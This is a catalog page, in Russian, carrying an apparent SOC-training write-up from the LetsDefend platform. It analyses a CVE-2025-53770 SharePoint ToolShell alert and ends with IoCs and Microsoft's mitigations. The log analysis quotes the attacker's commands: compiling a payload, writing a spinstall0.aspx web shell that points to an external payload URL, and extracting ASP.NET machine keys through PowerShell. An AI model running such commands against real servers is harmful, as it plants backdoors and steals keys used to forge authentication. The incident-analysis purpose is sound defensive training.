Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
-SOC342---CVE-2025-53770-SharePoint-ToolShell-Auth-Bypass-and-RCE — Мероприятие для тренировки навыков анализа и составления отчетов | Kitploit
Инструменты/GitHubGitHub/bossnick98/-soc342---cve-2025-53770-sharepoint-toolshell-auth-bypass-and-rce
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийФорензикаРазведка угрозОбучение и ОбразованиеРеагирование на ИнцидентыЛаборатории и Практика
GitHub
bossnick98/-soc342---cve-2025-53770-sharepoint-toolshell-auth-bypass-and-rce

-SOC342---CVE-2025-53770-SharePoint-ToolShell-Auth-Bypass-and-RCE

Мероприятие для тренировки навыков анализа и составления отчетов

Репозиторий
31 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

SOC342---CVE-2025-53770-SharePoint-ToolShell-Auth-Bypass-and-RCE

Это исследование, проведенное на платформе Let's Defend, основанное на недавней уязвимости SharePoint CVE. Давайте взглянем.

Immagine 2025-07-27 162109
  1. Изучите имя правила. Имена правил обычно создаются специально для обнаруживаемой атаки. Изучив имя правила, вы можете понять, с какой атакой вы столкнулись.

Правило SOC342 обнаружило неаутентифицированный POST-запрос, нацеленный на уязвимую страницу ToolPane.aspx, с:

большим полезными данными (Content-Length: 7699)

подозрительным реферером (SignOut.aspx), вероятно, используемым для сокрытия источника

поведением, соответствующим эксплуатации уязвимости ToolShell

  1. Определите, между какими двумя устройствами происходит трафик.

Внешний пользователь (IP: 107.191.58.76) отправил сконструированный запрос внутреннему серверу SharePoint (172.16.20.17).

Проанализируем лог нашей конечной точки.

2

Процесс w3wp.exe, выполняющий закодированную команду PowerShell, может указывать на потенциальную эксплуатацию или активность после эксплуатации (например, выполнение скрытой нагрузки).

В среде SharePoint важно проверить, является ли такое поведение ожидаемым или представляет собой злоупотребление.

Команда была обфусцирована с помощью base64.

Immagine 2025-07-27 163800

Эта нагрузка позволяет атакующему извлекать и выводить критические ключи конфигурации ASP.NET с компьютера, на котором она выполняется.

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /out:C:\Windows\Temp\payload.exe C:\Windows\Temp\payload.cs

"C:\Windows\System32\cmd.exe" /c echo <form runat="server"> <object classid="clsid:ADB880A6-D8FF-11CF-9377-00AA003B7A11"><param name="Command" value="Redirect"> <param name="Button" value="Test"> <param name="Url" value="http://107.191.58.76/payload.exe\"> > C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx

Компилирует исполняемый файл из исходного кода C# на сервере.

Создает веб-бэкдор (вредоносный ASPX-файл) в каталоге SharePoint, который при посещении позволяет выполнить или загрузить внешнюю нагрузку.

cmd.exe /c echo > C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx

Эта команда создает файл spinstall0.aspx в папке SharePoint LAYOUTS и записывает в него содержимое (здесь является заполнителем, представляющим код веб-шелла).

Вот хэш spinstall0.apx: 92bb4ddb98eeaf11fc15bb32e71d0a63256a0ed826a03ba293ce3a8bf057a514

Взглянем на VirusTotal.

Immagine 2025-07-27 164912

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "[System.Web.Configuration.MachineKeySection]::GetApplicationConfig()"

Эта команда позволяет атакующему получить доступ к конфигурации приложения MachineKeySection, что может раскрыть важные криптографические ключи, такие как ключ проверки и ключ расшифровки.

Эти ключи критически важны для безопасности ASP.NET, защищая такие вещи, как файлы cookie аутентификации и ViewState.

Раскрытие или получение этих ключей может позволить злоумышленникам подделывать токены аутентификации, расшифровывать защищенные данные или выполнять другие атаки на веб-приложение.

MITRE ATT&CK

mitre

Примечание аналитика:

Оповещение было сгенерировано из-за необычной активности PowerShell на сервере SharePoint, которая позже была определена как попытка эксплуатации уязвимости CVE-2025-53770. Атакующий сначала загрузил и скомпилировал пользовательский C# исполняемый файл (payload.exe) с помощью компилятора C# (csc.exe), затем создал вредоносный ASPX веб-шелл (spinstall0.aspx) в веб-доступном каталоге SharePoint. Впоследствии была запущена команда PowerShell для извлечения важных криптографических ключей с сервера через рефлексию .NET. Эта последовательность действий предполагает многофазную атаку, предназначенную для поддержания постоянного контроля и, возможно, подделки токенов аутентификации. Веб-шелл был подтвержден как вредоносный с коэффициентом обнаружения VirusTotal 39/62. Инцидент подтвержден как истинно положительный, и рекомендуется принять дальнейшие меры по сдерживанию и устранению последствий.

Immagine 2025-07-27 170751

Детали CVE-2025-53770

Десериализация недоверенных данных в локальном Microsoft SharePoint Server позволяет неавторизованному злоумышленнику выполнять код по сети. Microsoft известно, что эксплойт для CVE-2025-53770 существует в природе. Microsoft готовит и тщательно тестирует комплексное обновление для устранения этой уязвимости. Тем временем, пожалуйста, убедитесь, что меры по смягчению последствий, указанные в этой документации CVE, внедрены, чтобы вы были защищены от эксплуатации.

Immagine 2025-07-27 171020

Меры по смягчению последствий, рекомендованные Microsoft: Чтобы смягчить потенциальные атаки, клиенты должны:

  1. Использовать поддерживаемые версии локального SharePoint Server.

  2. Применить последние обновления безопасности, указанные выше.

  3. Развернуть защиту Microsoft Defender для конечных точек или эквивалентные решения для защиты от угроз.

  4. Убедиться, что интерфейс сканирования антивирусного ПО (AMSI) включен и правильно настроен, а также используется соответствующее антивирусное решение, такое как Defender Antivirus.

  5. Сбросить ключи ASP.NET SharePoint Server.

IoC

Spinstall0.aspx Веб-шелл, используемый злоумышленниками

Злоумышленники также изменяли имя файла различными способами – например, spinstall.aspx, spinstall1.aspx, spinstall2.aspx.

Этот отчет основан на активности, проведенной на платформе Let's Defend. Все представленные результаты и материалы предназначены только для образовательных целей. Все права и право собственности принадлежат Let's Defend.

Скачать инструмент